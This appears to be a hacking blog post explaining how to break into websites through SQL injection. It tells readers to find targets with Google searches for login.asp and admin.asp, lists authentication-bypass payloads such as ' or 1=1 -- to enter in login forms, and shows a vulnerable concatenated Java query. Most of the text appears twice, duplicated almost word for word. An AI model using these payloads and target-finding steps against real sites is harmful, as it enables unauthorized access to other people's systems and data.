Hello Friends,
in this post i am going to explain how to hack websites by SQL Injection.
this is the most common way to hack into website which is vulnerable to SQL injection.
What is SQL Injection... ?
A technique that exploits a security vulnerability occurring in the
database layer of an application. The vulnerability is present when
user input is either incorrectly filtered for string literal escape characters
embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
How to hack if SQL Injection found..?
To find a vulnerable host go to google and search for login.asp or admin.asp.It shows thousands of vulnerable sites. Now using proxys set in browser click through interesting targets...seeing whats what on the site pages if interesting.Let the site be :-
http://www.somesite.com/login.asp or
http://www.another.com/admin/login.asp
This page ask for username and password for login .You can try following username and password for login :-
admin'-- ' or 0=0 -- " or 0=0 --
or 0=0 -- ' or 0=0 # " or 0=0 #
or 0=0 # ' or 'x'='x " or "x"="x
') or ('x'='x ' or 1=1-- " or 1=1--
or 1=1-- ' or a=a-- " or "a"="a
') or ('a'='a ") or ("a"="a hi" or "a"="a
hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a
hi') or ('a'='a hi") or ("a"="a
i will try to post a long list of these combination soon.
How it works..?
Statement stmt = conn.createStatement(); ResultSet rs = stmt.executeQuery( "select * from user_details where user_name = '" + username + "' and password = '" + password + "'");
username = "' or 1=1 --".
Since the condition 1=1 is always true ,you succesfullylogged in the database server .
in this post i am going to explain how to hack websites by SQL Injection.
this is the most common way to hack into website which is vulnerable to SQL injection.
What is SQL Injection... ?
A technique that exploits a security vulnerability occurring in the
database layer of an application. The vulnerability is present when
user input is either incorrectly filtered for string literal escape characters
embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.
How to hack if SQL Injection found..?
To find a vulnerable host go to google and search for login.asp or admin.asp.It shows thousands of vulnerable sites. Now using proxys set in browser click through interesting targets...seeing whats what on the site pages if interesting.Let the site be :-
http://www.somesite.com/login.asp or
http://www.another.com/admin/login.asp
This page ask for username and password for login .You can try following username and password for login :-
or 0=0 -- ' or 0=0 # " or 0=0 #
or 0=0 # ' or 'x'='x " or "x"="x
') or ('x'='x ' or 1=1-- " or 1=1--
or 1=1-- ' or a=a-- " or "a"="a
') or ('a'='a ") or ("a"="a hi" or "a"="a
hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a
hi') or ('a'='a hi") or ("a"="a
i will try to post a long list of these combination soon.
How it works..?
Statement stmt = conn.createStatement(); ResultSet rs = stmt.executeQuery( "select * from user_details where user_name = '" + username + "' and password = '" + password + "'");
username = "' or 1=1 --".
Since the condition 1=1 is always true ,you succesfullylogged in the database server .
Hope you like this post, and if you are a developer try to escape these types of vulnerabilities.
your friend, Unknowndevice64
No Comment to " Website Hacking : How to hack website by SQL Injection "